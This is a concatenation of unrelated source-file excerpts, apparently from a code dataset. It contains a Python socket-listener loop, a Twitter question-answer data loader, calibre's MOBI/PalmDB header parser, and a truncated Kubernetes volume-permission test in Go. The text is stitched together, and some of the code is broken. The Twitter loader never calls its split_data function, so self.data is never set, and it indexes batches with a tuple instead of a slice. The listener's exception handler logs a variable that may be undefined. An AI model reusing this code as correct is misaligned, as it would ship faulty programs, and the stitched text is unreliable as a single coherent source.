signal.SIGINT: signal.getsignal(signal.SIGINT),
signal.SIGTERM: signal.getsignal(signal.SIGTERM),
signal.SIGCHLD: signal.getsignal(signal.SIGCHLD),
}
signal.signal(signal.SIGINT, self.do_SIGINT)
signal.signal(signal.SIGTERM, self.do_SIGTERM)
if not multiprocessing:
# os.fork() (python 2.4) child reaper
signal.signal(signal.SIGCHLD, self.fallback_SIGCHLD)
else:
# make sure that _cleanup is called when children die
# by calling active_children on SIGCHLD
signal.signal(signal.SIGCHLD, self.multiprocessing_SIGCHLD)
last_active_time = self.launch_time
try:
while True:
try:
try:
startsock = None
pid = err = 0
child_count = 0
if multiprocessing:
# Collect zombie child processes
child_count = len(multiprocessing.active_children())
time_elapsed = time.time() - self.launch_time
if self.timeout and time_elapsed > self.timeout:
self.msg('listener exit due to --timeout %s'
% self.timeout)
break
if self.idle_timeout:
idle_time = 0
if child_count == 0:
idle_time = time.time() - last_active_time
else:
idle_time = 0
last_active_time = time.time()
if idle_time > self.idle_timeout and child_count == 0:
self.msg('listener exit due to --idle-timeout %s'
% self.idle_timeout)
break
try:
self.poll()
ready = select.select([lsock], [], [], 1)[0]
if lsock in ready:
startsock, address = lsock.accept()
else:
continue
except self.Terminate:
raise
except Exception:
_, exc, _ = sys.exc_info()
if hasattr(exc, 'errno'):
err = exc.errno
elif hasattr(exc, 'args'):
err = exc.args[0]
else:
err = exc[0]
if err == errno.EINTR:
self.vmsg("Ignoring interrupted syscall")
continue
else:
raise
if self.run_once:
# Run in same process if run_once
self.top_new_client(startsock, address)
if self.ws_connection :
self.msg('%s: exiting due to --run-once'
% address[0])
break
elif multiprocessing:
self.vmsg('%s: new handler Process' % address[0])
p = multiprocessing.Process(
target=self.top_new_client,
args=(startsock, address))
p.start()
# child will not return
else:
# python 2.4
self.vmsg('%s: forking handler' % address[0])
pid = os.fork()
if pid == 0:
# child handler process
self.top_new_client(startsock, address)
break # child process exits
# parent process
self.handler_id += 1
except (self.Terminate, SystemExit, KeyboardInterrupt):
self.msg("In exit")
break
except Exception:
self.msg("handler exception: %s", str(exc))
self.vmsg("exception", exc_info=True)
finally:
if startsock:
startsock.close()
finally:
# Close listen port
self.vmsg("Closing socket listening at %s:%s",
self.listen_host, self.listen_port)
lsock.close()
# Restore signals
for sig, func in original_signals.items():
signal.signal(sig, func) | unknown | codeparrot/codeparrot-clean | ||
import data_utils
import numpy as np
PATH = '../data/twitter/'
class Twitter(object):
def __init__(self, path=PATH):
# data
metadata, idx_q, idx_a = data_utils.load_data('../data/')
# get dictionaries
i2w = metadata['idx2w']
w2i = metadata['w2idx']
# num of examples
n = len(idx_q)
def split_data():
data = {}
# sample indices from range(0,n)
n_train = int(n*0.8)
n_test = n - n_train
indices = list(range(n))
np.random.shuffle(indices)
data['train'] = ( idx_q[indices][:n_train], idx_a[indices][:n_train] )
data['test'] = ( idx_q[indices][n_train:], idx_a[indices][n_train:] )
self.data = data
def batch(self, batch_size, idx, data_key='train'):
# get indices of batch size
indices = list(range(batch_size))
# shuffle indices within batch
np.random.shuffle(indices)
# return shuffled batch
x,y = self.data[data_key]
start, end = idx*batch_size, (idx+1)*batch_size
return x[indices][start, end], y[indices][start, end] | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2012, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import struct, datetime, os
from calibre.utils.date import utc_tz
from calibre.ebooks.mobi.reader.headers import NULL_INDEX
from calibre.ebooks.mobi.langcodes import main_language, sub_language
from calibre.ebooks.mobi.debug import format_bytes
from calibre.ebooks.mobi.utils import get_trailing_data
# PalmDB {{{
class PalmDOCAttributes(object):
class Attr(object):
def __init__(self, name, field, val):
self.name = name
self.val = val & field
def __str__(self):
return '%s: %s'%(self.name, bool(self.val))
def __init__(self, raw):
self.val = struct.unpack(b'<H', raw)[0]
self.attributes = []
for name, field in [('Read Only', 0x02), ('Dirty AppInfoArea', 0x04),
('Backup this database', 0x08),
('Okay to install newer over existing copy, if present on PalmPilot', 0x10),
('Force the PalmPilot to reset after this database is installed', 0x12),
('Don\'t allow copy of file to be beamed to other Pilot',
0x14)]:
self.attributes.append(PalmDOCAttributes.Attr(name, field,
self.val))
def __str__(self):
attrs = '\n\t'.join([str(x) for x in self.attributes])
return 'PalmDOC Attributes: %s\n\t%s'%(bin(self.val), attrs)
class PalmDB(object):
def __init__(self, raw):
self.raw = raw
if self.raw.startswith(b'TPZ'):
raise ValueError('This is a Topaz file')
self.name = self.raw[:32].replace(b'\x00', b'')
self.attributes = PalmDOCAttributes(self.raw[32:34])
self.version = struct.unpack(b'>H', self.raw[34:36])[0]
palm_epoch = datetime.datetime(1904, 1, 1, tzinfo=utc_tz)
self.creation_date_raw = struct.unpack(b'>I', self.raw[36:40])[0]
self.creation_date = (palm_epoch +
datetime.timedelta(seconds=self.creation_date_raw))
self.modification_date_raw = struct.unpack(b'>I', self.raw[40:44])[0]
self.modification_date = (palm_epoch +
datetime.timedelta(seconds=self.modification_date_raw))
self.last_backup_date_raw = struct.unpack(b'>I', self.raw[44:48])[0]
self.last_backup_date = (palm_epoch +
datetime.timedelta(seconds=self.last_backup_date_raw))
self.modification_number = struct.unpack(b'>I', self.raw[48:52])[0]
self.app_info_id = self.raw[52:56]
self.sort_info_id = self.raw[56:60]
self.type = self.raw[60:64]
self.creator = self.raw[64:68]
self.ident = self.type + self.creator
if self.ident not in (b'BOOKMOBI', b'TEXTREAD'):
raise ValueError('Unknown book ident: %r'%self.ident)
self.last_record_uid, = struct.unpack(b'>I', self.raw[68:72])
self.next_rec_list_id = self.raw[72:76]
self.number_of_records, = struct.unpack(b'>H', self.raw[76:78])
def __str__(self):
ans = ['*'*20 + ' PalmDB Header '+ '*'*20]
ans.append('Name: %r'%self.name)
ans.append(str(self.attributes))
ans.append('Version: %s'%self.version)
ans.append('Creation date: %s (%s)'%(self.creation_date.isoformat(),
self.creation_date_raw))
ans.append('Modification date: %s (%s)'%(self.modification_date.isoformat(),
self.modification_date_raw))
ans.append('Backup date: %s (%s)'%(self.last_backup_date.isoformat(),
self.last_backup_date_raw))
ans.append('Modification number: %s'%self.modification_number)
ans.append('App Info ID: %r'%self.app_info_id)
ans.append('Sort Info ID: %r'%self.sort_info_id)
ans.append('Type: %r'%self.type)
ans.append('Creator: %r'%self.creator)
ans.append('Last record UID +1: %r'%self.last_record_uid)
ans.append('Next record list id: %r'%self.next_rec_list_id)
ans.append('Number of records: %s'%self.number_of_records)
return '\n'.join(ans)
# }}}
class Record(object): # {{{
def __init__(self, raw, header):
self.offset, self.flags, self.uid = header
self.raw = raw
@property
def header(self):
return 'Offset: %d Flags: %d UID: %d First 4 bytes: %r Size: %d'%(self.offset, self.flags,
self.uid, self.raw[:4], len(self.raw))
# }}}
# EXTH {{{
class EXTHRecord(object):
def __init__(self, type_, data, length):
self.type = type_
self.data = data
self.length = length
self.name = {
1 : 'Drm Server Id',
2 : 'Drm Commerce Id',
3 : 'Drm Ebookbase Book Id',
100 : 'Creator',
101 : 'Publisher',
102 : 'Imprint',
103 : 'Description',
104 : 'ISBN',
105 : 'Subject',
106 : 'Published',
107 : 'Review',
108 : 'Contributor',
109 : 'Rights',
110 : 'SubjectCode',
111 : 'Type',
112 : 'Source',
113 : 'ASIN',
114 : 'versionNumber',
115 : 'sample',
116 : 'StartOffset',
117 : 'Adult',
118 : 'Price',
119 : 'Currency',
121 : 'KF8_Boundary_Section',
122 : 'fixed-layout',
123 : 'book-type',
124 : 'orientation-lock',
125 : 'KF8_Count_of_Resources_Fonts_Images',
126 : 'original-resolution',
127 : 'zero-gutter',
128 : 'zero-margin',
129 : 'KF8_Masthead/Cover_Image',
131 : 'KF8_Unidentified_Count',
132 : 'RegionMagnification',
200 : 'DictShortName',
201 : 'CoverOffset',
202 : 'ThumbOffset',
203 : 'Fake Cover',
204 : 'Creator Software',
205 : 'Creator Major Version', # '>I'
206 : 'Creator Minor Version', # '>I'
207 : 'Creator Build Number', # '>I'
208 : 'Watermark',
209 : 'Tamper Proof Keys [hex]',
300 : 'Font Signature [hex]',
301 : 'Clipping Limit [3xx]', # percentage '>B'
401 : 'Clipping Limit', # percentage '>B'
402 : 'Publisher Limit',
404 : 'Text to Speech Disabled', # '>B' 1 - TTS disabled 0 - TTS enabled
501 : 'CDE Type', # 4 chars (PDOC, EBOK, MAGZ, ...)
502 : 'last_update_time',
503 : 'Updated Title',
504 : 'ASIN [5xx]',
508 : 'Unknown Title Furigana?',
517 : 'Unknown Creator Furigana?',
522 : 'Unknown Publisher Furigana?',
524 : 'Language',
525 : 'primary-writing-mode',
527 : 'page-progression-direction',
528 : 'Override Kindle fonts',
534 : 'Input Source Type',
535 : 'Kindlegen Build-Rev Number',
536 : 'Container Info', # CONT_Header is 0, Ends with CONTAINER_BOUNDARY (or Asset_Type?)
538 : 'Container Resolution',
539 : 'Container Mimetype',
543 : 'Container id', # FONT_CONTAINER, BW_CONTAINER, HD_CONTAINER
}.get(self.type, repr(self.type))
if (self.name in {'sample', 'StartOffset', 'CoverOffset', 'ThumbOffset', 'Fake Cover',
'Creator Software', 'Creator Major Version', 'Creator Minor Version',
'Creator Build Number', 'Clipping Limit (3xx)', 'Clipping Limit',
'Publisher Limit', 'Text to Speech Disabled'} or
self.type in {121, 125, 131}):
if self.length == 9:
self.data, = struct.unpack(b'>B', self.data)
elif self.length == 10:
self.data, = struct.unpack(b'>H', self.data)
else:
self.data, = struct.unpack(b'>L', self.data)
elif self.type in {209, 300}:
self.data = bytes(self.data.encode('hex'))
def __str__(self):
return '%s (%d): %r'%(self.name, self.type, self.data)
class EXTHHeader(object):
def __init__(self, raw):
self.raw = raw
if not self.raw.startswith(b'EXTH'):
raise ValueError('EXTH header does not start with EXTH')
self.length, = struct.unpack(b'>L', self.raw[4:8])
self.count, = struct.unpack(b'>L', self.raw[8:12])
pos = 12
self.records = []
for i in xrange(self.count):
pos = self.read_record(pos)
self.records.sort(key=lambda x:x.type)
self.rmap = {x.type:x for x in self.records}
def __getitem__(self, type_):
return self.rmap.__getitem__(type_).data
def get(self, type_, default=None):
ans = self.rmap.get(type_, default)
return getattr(ans, 'data', default)
def read_record(self, pos):
type_, length = struct.unpack(b'>LL', self.raw[pos:pos+8])
data = self.raw[(pos+8):(pos+length)]
self.records.append(EXTHRecord(type_, data, length))
return pos + length
@property
def kf8_header_index(self):
ans = self.get(121, None)
if ans == NULL_INDEX:
ans = None
return ans
def __str__(self):
ans = ['*'*20 + ' EXTH Header '+ '*'*20]
ans.append('EXTH header length: %d'%self.length)
ans.append('Number of EXTH records: %d'%self.count)
ans.append('EXTH records...')
for r in self.records:
ans.append(str(r))
return '\n'.join(ans)
# }}}
class MOBIHeader(object): # {{{
def __init__(self, record0, offset):
self.raw = record0.raw
self.header_offset = offset
self.compression_raw = self.raw[:2]
self.compression = {1: 'No compression', 2: 'PalmDoc compression',
17480: 'HUFF/CDIC compression'}.get(struct.unpack(b'>H',
self.compression_raw)[0],
repr(self.compression_raw))
self.unused = self.raw[2:4]
self.text_length, = struct.unpack(b'>I', self.raw[4:8])
self.number_of_text_records, self.text_record_size = \
struct.unpack(b'>HH', self.raw[8:12])
self.encryption_type_raw, = struct.unpack(b'>H', self.raw[12:14])
self.encryption_type = {
0: 'No encryption',
1: 'Old mobipocket encryption',
2: 'Mobipocket encryption'
}.get(self.encryption_type_raw, repr(self.encryption_type_raw))
self.unknown = self.raw[14:16]
self.identifier = self.raw[16:20]
if self.identifier != b'MOBI':
raise ValueError('Identifier %r unknown'%self.identifier)
self.length, = struct.unpack(b'>I', self.raw[20:24])
self.type_raw, = struct.unpack(b'>I', self.raw[24:28])
self.type = {
2 : 'Mobipocket book',
3 : 'PalmDOC book',
4 : 'Audio',
257 : 'News',
258 : 'News Feed',
259 : 'News magazine',
513 : 'PICS',
514 : 'Word',
515 : 'XLS',
516 : 'PPT',
517 : 'TEXT',
518 : 'HTML',
}.get(self.type_raw, repr(self.type_raw))
self.encoding_raw, = struct.unpack(b'>I', self.raw[28:32])
self.encoding = {
1252 : 'cp1252',
65001: 'utf-8',
}.get(self.encoding_raw, repr(self.encoding_raw))
self.uid = self.raw[32:36]
self.file_version, = struct.unpack(b'>I', self.raw[36:40])
self.meta_orth_indx, self.meta_infl_indx = struct.unpack(
b'>II', self.raw[40:48])
self.secondary_index_record, = struct.unpack(b'>I', self.raw[48:52])
self.reserved = self.raw[52:80]
self.first_non_book_record, = struct.unpack(b'>I', self.raw[80:84])
self.fullname_offset, = struct.unpack(b'>I', self.raw[84:88])
self.fullname_length, = struct.unpack(b'>I', self.raw[88:92])
self.locale_raw, = struct.unpack(b'>I', self.raw[92:96])
langcode = self.locale_raw
langid = langcode & 0xFF
sublangid = (langcode >> 10) & 0xFF
self.language = main_language.get(langid, 'ENGLISH')
self.sublanguage = sub_language.get(sublangid, 'NEUTRAL')
self.input_language = self.raw[96:100]
self.output_langauage = self.raw[100:104]
self.min_version, = struct.unpack(b'>I', self.raw[104:108])
self.first_image_index, = struct.unpack(b'>I', self.raw[108:112])
self.huffman_record_offset, = struct.unpack(b'>I', self.raw[112:116])
self.huffman_record_count, = struct.unpack(b'>I', self.raw[116:120])
self.datp_record_offset, = struct.unpack(b'>I', self.raw[120:124])
self.datp_record_count, = struct.unpack(b'>I', self.raw[124:128])
self.exth_flags, = struct.unpack(b'>I', self.raw[128:132])
self.has_exth = bool(self.exth_flags & 0x40)
self.has_drm_data = self.length >= 174 and len(self.raw) >= 184
if self.has_drm_data:
self.unknown3 = self.raw[132:168]
self.drm_offset, self.drm_count, self.drm_size, self.drm_flags = \
struct.unpack(b'>4I', self.raw[168:184])
self.has_extra_data_flags = self.length >= 232 and len(self.raw) >= 232+16
self.has_fcis_flis = False
self.has_multibytes = self.has_indexing_bytes = self.has_uncrossable_breaks = False
self.extra_data_flags = 0
if self.has_extra_data_flags:
self.unknown4 = self.raw[184:192]
if self.file_version < 8:
self.first_text_record, self.last_text_record = \
struct.unpack_from(b'>HH', self.raw, 192)
self.fdst_count = struct.unpack_from(b'>L', self.raw, 196)
else:
self.fdst_idx, self.fdst_count = struct.unpack_from(b'>LL',
self.raw, 192)
if self.fdst_count <= 1:
self.fdst_idx = NULL_INDEX
(self.fcis_number, self.fcis_count, self.flis_number,
self.flis_count) = struct.unpack(b'>IIII',
self.raw[200:216])
self.unknown6 = self.raw[216:224]
self.srcs_record_index = struct.unpack(b'>I',
self.raw[224:228])[0]
self.num_srcs_records = struct.unpack(b'>I',
self.raw[228:232])[0]
self.unknown7 = self.raw[232:240]
self.extra_data_flags = struct.unpack(b'>I',
self.raw[240:244])[0]
self.has_multibytes = bool(self.extra_data_flags & 0b1)
self.has_indexing_bytes = bool(self.extra_data_flags & 0b10)
self.has_uncrossable_breaks = bool(self.extra_data_flags & 0b100)
self.primary_index_record, = struct.unpack(b'>I',
self.raw[244:248])
if self.length >= 248:
(self.sect_idx, self.skel_idx, self.datp_idx, self.oth_idx
) = struct.unpack_from(b'>4L', self.raw, 248)
self.unknown9 = self.raw[264:self.length+16]
if self.meta_orth_indx not in {NULL_INDEX, self.sect_idx}:
raise ValueError('KF8 header has different Meta orth and '
'section indices')
# The following are all relative to the position of the header record
# make them absolute for ease of debugging
self.relative_records = {'sect_idx', 'skel_idx', 'datp_idx', 'oth_idx',
'meta_orth_indx', 'huffman_record_offset',
'first_non_book_record', 'datp_record_offset', 'fcis_number',
'flis_number', 'primary_index_record', 'fdst_idx',
'first_image_index'}
for x in self.relative_records:
if hasattr(self, x) and getattr(self, x) != NULL_INDEX:
setattr(self, x, self.header_offset+getattr(self, x))
# Try to find the first non-text record
self.first_resource_record = offset + 1 + self.number_of_text_records # Default to first record after all text records
pointer = min(getattr(self, 'first_non_book_record', NULL_INDEX), getattr(self, 'first_image_index', NULL_INDEX))
if pointer != NULL_INDEX:
self.first_resource_record = max(pointer, self.first_resource_record)
self.last_resource_record = NULL_INDEX
if self.has_exth:
self.exth_offset = 16 + self.length
self.exth = EXTHHeader(self.raw[self.exth_offset:])
self.end_of_exth = self.exth_offset + self.exth.length
self.bytes_after_exth = self.raw[self.end_of_exth:self.fullname_offset]
if self.exth.kf8_header_index is not None and offset == 0:
# MOBI 6 header in a joint file, adjust self.last_resource_record
self.last_resource_record = self.exth.kf8_header_index - 2
def __str__(self):
ans = ['*'*20 + ' MOBI %d Header '%self.file_version+ '*'*20]
a = ans.append
def i(d, x):
x = 'NULL' if x == NULL_INDEX else x
a('%s: %s'%(d, x))
def r(d, attr):
x = getattr(self, attr)
if attr in self.relative_records and x != NULL_INDEX:
a('%s: Absolute: %d Relative: %d'%(d, x, x-self.header_offset))
else:
i(d, x)
a('Compression: %s'%self.compression)
a('Unused: %r'%self.unused)
a('Text length: %d'%self.text_length)
a('Number of text records: %d'%self.number_of_text_records)
a('Text record size: %d'%self.text_record_size)
a('Encryption: %s'%self.encryption_type)
a('Unknown: %r'%self.unknown)
a('Identifier: %r'%self.identifier)
a('Header length: %d'% self.length)
a('Type: %s'%self.type)
a('Encoding: %s'%self.encoding)
a('UID: %r'%self.uid)
a('File version: %d'%self.file_version)
r('Meta Orth Index', 'meta_orth_indx')
r('Meta Infl Index', 'meta_infl_indx')
r('Secondary index record', 'secondary_index_record')
a('Reserved: %r'%self.reserved)
r('First non-book record', 'first_non_book_record')
a('Full name offset: %d'%self.fullname_offset)
a('Full name length: %d bytes'%self.fullname_length)
a('Langcode: %r'%self.locale_raw)
a('Language: %s'%self.language)
a('Sub language: %s'%self.sublanguage)
a('Input language: %r'%self.input_language)
a('Output language: %r'%self.output_langauage)
a('Min version: %d'%self.min_version)
r('First Image index', 'first_image_index')
r('Huffman record offset', 'huffman_record_offset')
a('Huffman record count: %d'%self.huffman_record_count)
r('Huffman table offset', 'datp_record_offset')
a('Huffman table length: %r'%self.datp_record_count)
a('EXTH flags: %s (%s)'%(bin(self.exth_flags)[2:], self.has_exth))
if self.has_drm_data:
a('Unknown3: %r'%self.unknown3)
r('DRM Offset', 'drm_offset')
a('DRM Count: %s'%self.drm_count)
a('DRM Size: %s'%self.drm_size)
a('DRM Flags: %r'%self.drm_flags)
if self.has_extra_data_flags:
a('Unknown4: %r'%self.unknown4)
if hasattr(self, 'first_text_record'):
a('First content record: %d'%self.first_text_record)
a('Last content record: %d'%self.last_text_record)
else:
r('FDST Index', 'fdst_idx')
a('FDST Count: %d'% self.fdst_count)
r('FCIS number', 'fcis_number')
a('FCIS count: %d'% self.fcis_count)
r('FLIS number', 'flis_number')
a('FLIS count: %d'% self.flis_count)
a('Unknown6: %r'% self.unknown6)
r('SRCS record index', 'srcs_record_index')
a('Number of SRCS records?: %d'%self.num_srcs_records)
a('Unknown7: %r'%self.unknown7)
a(('Extra data flags: %s (has multibyte: %s) '
'(has indexing: %s) (has uncrossable breaks: %s)')%(
bin(self.extra_data_flags), self.has_multibytes,
self.has_indexing_bytes, self.has_uncrossable_breaks))
r('NCX index', 'primary_index_record')
if self.length >= 248:
r('Sections Index', 'sect_idx')
r('SKEL Index', 'skel_idx')
r('DATP Index', 'datp_idx')
r('Other Index', 'oth_idx')
if self.unknown9:
a('Unknown9: %r'%self.unknown9)
ans = '\n'.join(ans)
if self.has_exth:
ans += '\n\n' + str(self.exth)
ans += '\n\nBytes after EXTH (%d bytes): %s'%(
len(self.bytes_after_exth),
format_bytes(self.bytes_after_exth))
ans += '\nNumber of bytes after full name: %d' % (len(self.raw) - (self.fullname_offset +
self.fullname_length))
ans += '\nRecord 0 length: %d'%len(self.raw)
return ans
# }}}
class MOBIFile(object):
def __init__(self, stream):
self.raw = stream.read()
self.palmdb = PalmDB(self.raw[:78])
self.record_headers = []
self.records = []
for i in xrange(self.palmdb.number_of_records):
pos = 78 + i * 8
offset, a1, a2, a3, a4 = struct.unpack(b'>LBBBB', self.raw[pos:pos+8])
flags, val = a1, a2 << 16 | a3 << 8 | a4
self.record_headers.append((offset, flags, val))
def section(section_number):
if section_number == self.palmdb.number_of_records - 1:
end_off = len(self.raw)
else:
end_off = self.record_headers[section_number + 1][0]
off = self.record_headers[section_number][0]
return self.raw[off:end_off]
for i in range(self.palmdb.number_of_records):
self.records.append(Record(section(i), self.record_headers[i]))
self.mobi_header = MOBIHeader(self.records[0], 0)
self.huffman_record_nums = []
self.kf8_type = None
mh = mh8 = self.mobi_header
if mh.file_version >= 8:
self.kf8_type = 'standalone'
elif mh.has_exth and mh.exth.kf8_header_index is not None:
kf8i = mh.exth.kf8_header_index
try:
rec = self.records[kf8i-1]
except IndexError:
pass
else:
if rec.raw == b'BOUNDARY':
self.kf8_type = 'joint'
mh8 = MOBIHeader(self.records[kf8i], kf8i)
self.mobi8_header = mh8
if 'huff' in self.mobi_header.compression.lower():
from calibre.ebooks.mobi.huffcdic import HuffReader
def huffit(off, cnt):
huffman_record_nums = list(xrange(off, off+cnt))
huffrecs = [self.records[r].raw for r in huffman_record_nums]
huffs = HuffReader(huffrecs)
return huffman_record_nums, huffs.unpack
if self.kf8_type == 'joint':
recs6, d6 = huffit(mh.huffman_record_offset,
mh.huffman_record_count)
recs8, d8 = huffit(mh8.huffman_record_offset,
mh8.huffman_record_count)
self.huffman_record_nums = recs6 + recs8
else:
self.huffman_record_nums, d6 = huffit(mh.huffman_record_offset,
mh.huffman_record_count)
d8 = d6
elif 'palmdoc' in self.mobi_header.compression.lower():
from calibre.ebooks.compression.palmdoc import decompress_doc
d8 = d6 = decompress_doc
else:
d8 = d6 = lambda x: x
self.decompress6, self.decompress8 = d6, d8
class TextRecord(object): # {{{
def __init__(self, idx, record, extra_data_flags, decompress):
self.trailing_data, self.raw = get_trailing_data(record.raw, extra_data_flags)
raw_trailing_bytes = record.raw[len(self.raw):]
self.raw = decompress(self.raw)
if 0 in self.trailing_data:
self.trailing_data['multibyte_overlap'] = self.trailing_data.pop(0)
if 1 in self.trailing_data:
self.trailing_data['indexing'] = self.trailing_data.pop(1)
if 2 in self.trailing_data:
self.trailing_data['uncrossable_breaks'] = self.trailing_data.pop(2)
self.trailing_data['raw_bytes'] = raw_trailing_bytes
for typ, val in self.trailing_data.iteritems():
if isinstance(typ, int):
print ('Record %d has unknown trailing data of type: %d : %r'%
(idx, typ, val))
self.idx = idx
def dump(self, folder):
name = '%06d'%self.idx
with open(os.path.join(folder, name+'.txt'), 'wb') as f:
f.write(self.raw)
with open(os.path.join(folder, name+'.trailing_data'), 'wb') as f:
for k, v in self.trailing_data.iteritems():
raw = '%s : %r\n\n'%(k, v)
f.write(raw.encode('utf-8'))
def __len__(self):
return len(self.raw)
# }}} | unknown | codeparrot/codeparrot-clean | ||
//go:build linux
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package volume
import (
"fmt"
"os"
"path/filepath"
"syscall"
"testing"
"time"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/record"
utiltesting "k8s.io/client-go/util/testing"
)
type localFakeMounter struct {
path string
attributes Attributes
}
func (l *localFakeMounter) GetPath() string {
return l.path
}
func (l *localFakeMounter) GetAttributes() Attributes {
return l.attributes
}
func (l *localFakeMounter) SetUp(mounterArgs MounterArgs) error {
return nil
}
func (l *localFakeMounter) SetUpAt(dir string, mounterArgs MounterArgs) error {
return nil
}
func (l *localFakeMounter) GetMetrics() (*Metrics, error) {
return nil, nil
}
func TestSkipPermissionChange(t *testing.T) {
always := v1.FSGroupChangeAlways
onrootMismatch := v1.FSGroupChangeOnRootMismatch
tests := []struct {
description string
fsGroupChangePolicy *v1.PodFSGroupChangePolicy
gidOwnerMatch bool
permissionMatch bool
sgidMatch bool
skipPermssion bool
}{
{
description: "skippermission=false, policy=nil",
skipPermssion: false,
},
{
description: "skippermission=false, policy=always",
fsGroupChangePolicy: &always,
skipPermssion: false,
},
{
description: "skippermission=false, policy=always, gidmatch=true",
fsGroupChangePolicy: &always,
skipPermssion: false,
gidOwnerMatch: true,
},
{
description: "skippermission=false, policy=nil, gidmatch=true",
fsGroupChangePolicy: nil,
skipPermssion: false,
gidOwnerMatch: true,
},
{
description: "skippermission=false, policy=onrootmismatch, gidmatch=false",
fsGroupChangePolicy: &onrootMismatch,
gidOwnerMatch: false,
skipPermssion: false,
},
{
description: "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=false",
fsGroupChangePolicy: &onrootMismatch,
gidOwnerMatch: true,
permissionMatch: false,
skipPermssion: false,
},
{
description: "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=true",
fsGroupChangePolicy: &onrootMismatch,
gidOwnerMatch: true,
permissionMatch: true,
skipPermssion: false,
},
{
description: "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=true, sgidmatch=true",
fsGroupChangePolicy: &onrootMismatch,
gidOwnerMatch: true,
permissionMatch: true,
sgidMatch: true,
skipPermssion: true,
},
}
for _, test := range tests {
t.Run(test.description, func(t *testing.T) {
tmpDir, err := utiltesting.MkTmpdir("volume_linux_test")
if err != nil {
t.Fatalf("error creating temp dir: %v", err)
}
defer func() {
err := os.RemoveAll(tmpDir)
if err != nil {
t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
}
}()
info, err := os.Lstat(tmpDir)
if err != nil {
t.Fatalf("error reading permission of tmpdir: %v", err)
}
stat, ok := info.Sys().(*syscall.Stat_t)
if !ok || stat == nil {
t.Fatalf("error reading permission stats for tmpdir: %s", tmpDir)
}
gid := stat.Gid
var expectedGID int64
if test.gidOwnerMatch {
expectedGID = int64(gid)
} else {
expectedGID = int64(gid + 3000)
}
mask := rwMask
if test.permissionMatch {
mask |= execMask
}
if test.sgidMatch {
mask |= os.ModeSetgid
mask = info.Mode() | mask
} else {
nosgidPerm := info.Mode() &^ os.ModeSetgid
mask = nosgidPerm | mask
}
err = os.Chmod(tmpDir, mask)
if err != nil {
t.Errorf("Chmod failed on %v: %v", tmpDir, err)
}
mounter := &localFakeMounter{path: tmpDir}
ok = skipPermissionChange(mounter, tmpDir, &expectedGID, test.fsGroupChangePolicy)
if ok != test.skipPermssion {
t.Errorf("for %s expected skipPermission to be %v got %v", test.description, test.skipPermssion, ok)
}
})
}
}
func TestSetVolumeOwnershipMode(t *testing.T) {
always := v1.FSGroupChangeAlways
onrootMismatch := v1.FSGroupChangeOnRootMismatch
expectedMask := rwMask | os.ModeSetgid | execMask
tests := []struct {
description string
fsGroupChangePolicy *v1.PodFSGroupChangePolicy
setupFunc func(path string) error
assertFunc func(path string) error
}{
{
description: "featuregate=on, fsgroupchangepolicy=always",
fsGroupChangePolicy: &always,
setupFunc: func(path string) error {
info, err := os.Lstat(path)
if err != nil {
return err
}
// change mode of root folder to be right
err = os.Chmod(path, info.Mode()|expectedMask)
if err != nil {
return err
}
// create a subdirectory with invalid permissions
rogueDir := filepath.Join(path, "roguedir")
nosgidPerm := info.Mode() &^ os.ModeSetgid
err = os.Mkdir(rogueDir, nosgidPerm)
if err != nil {
return err
}
return nil
},
assertFunc: func(path string) error {
rogueDir := filepath.Join(path, "roguedir")
hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
if !hasCorrectPermissions {
return fmt.Errorf("invalid permissions on %s", rogueDir)
}
return nil
},
},
{
description: "featuregate=on, fsgroupchangepolicy=onrootmismatch,rootdir=validperm",
fsGroupChangePolicy: &onrootMismatch,
setupFunc: func(path string) error {
info, err := os.Lstat(path)
if err != nil {
return err
}
// change mode of root folder to be right
err = os.Chmod(path, info.Mode()|expectedMask)
if err != nil {
return err
}
// create a subdirectory with invalid permissions
rogueDir := filepath.Join(path, "roguedir")
err = os.Mkdir(rogueDir, rwMask)
if err != nil {
return err
}
return nil
},
assertFunc: func(path string) error {
rogueDir := filepath.Join(path, "roguedir")
hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
if hasCorrectPermissions {
return fmt.Errorf("invalid permissions on %s", rogueDir)
}
return nil
},
},
{
description: "featuregate=on, fsgroupchangepolicy=onrootmismatch,rootdir=invalidperm",
fsGroupChangePolicy: &onrootMismatch,
setupFunc: func(path string) error {
// change mode of root folder to be right
err := os.Chmod(path, 0770)
if err != nil {
return err
}
// create a subdirectory with invalid permissions
rogueDir := filepath.Join(path, "roguedir")
err = os.Mkdir(rogueDir, rwMask)
if err != nil {
return err
}
return nil
},
assertFunc: func(path string) error {
rogueDir := filepath.Join(path, "roguedir")
hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
if !hasCorrectPermissions {
return fmt.Errorf("invalid permissions on %s", rogueDir)
}
return nil
},
},
}
for _, test := range tests {
t.Run(test.description, func(t *testing.T) {
tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
if err != nil {
t.Fatalf("error creating temp dir: %v", err)
}
defer func() {
err := os.RemoveAll(tmpDir)
if err != nil {
t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
}
}()
info, err := os.Lstat(tmpDir)
if err != nil {
t.Fatalf("error reading permission of tmpdir: %v", err)
}
stat, ok := info.Sys().(*syscall.Stat_t)
if !ok || stat == nil {
t.Fatalf("error reading permission stats for tmpdir: %s", tmpDir)
}
var expectedGID = int64(stat.Gid)
err = test.setupFunc(tmpDir)
if err != nil {
